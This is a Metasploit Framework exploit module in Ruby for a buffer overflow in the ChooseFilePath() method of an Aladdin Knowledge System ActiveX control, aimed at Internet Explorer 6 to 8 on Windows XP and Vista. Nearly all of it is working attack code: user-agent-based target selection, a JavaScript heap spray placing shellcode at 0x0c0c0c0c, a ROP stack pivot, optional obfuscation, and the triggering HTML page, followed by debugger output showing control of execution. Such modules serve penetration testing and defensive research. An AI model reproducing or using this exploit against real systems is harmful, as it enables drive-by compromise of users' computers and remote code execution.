## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::RopDb autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => Rank, :classid => "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}", :method => "ChooseFilePath", }) def initialize(info={}) super(update_info(info, 'Name' => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Aladdin Knowledge System's ActiveX component. By supplying a long string of data to the ChooseFilePath() function, a buffer overflow occurs, which may result in remote code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'shinnai', #Vulnerability Discovery 'b33f', #Original exploit 'sinn3r', #Metasploit 'juan vazquez' #Metasploit, IE8 target ], 'References' => [ [ 'OSVDB', '86723' ], [ 'EDB', '22258' ], [ 'EDB', '22301' ] ], 'Payload' => { 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Rop' => false, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], [ 'IE 7 on Windows XP SP3', { 'Rop' => false, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => true, 'Offset' => '0x5f6', 'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll } ], [ 'IE 7 on Windows Vista', { 'Rop' => false, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ] ], 'Privileged' => false, 'DisclosureDate' => "Apr 1 2012", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) # Land the payload at 0x0c0c0c0c js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def load_exploit_html(my_target, cli) if my_target['Rop'] p = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'}) else p = payload.encoded end spray = ie_heap_spray(my_target, p) html = %Q| <html> <object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object> <script> #{spray} junk=''; for( counter=0; counter<=267; counter++) junk+=unescape("%0c"); pwnd.ChooseFilePath(junk + "#{Rex::Text.to_hex([my_target.ret].pack("V"))}"); </script> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end =begin 0:008> g (82c.12dc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8 eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 OLEAUT32!SysReAllocStringLen+0x31: 7712a41a 8b00 mov eax,dword ptr [eax] ds:0023:0c0c0c0c=???????? 0:008> g (82c.12dc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000 eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 0c0c0c0c ?? ??? 0:008> db 020bf798 020bf798 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ 020bf7a8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ 020bf7b8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ 020bf7c8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ 020bf7d8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ 020bf7e8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ 020bf7f8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ 020bf808 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ =end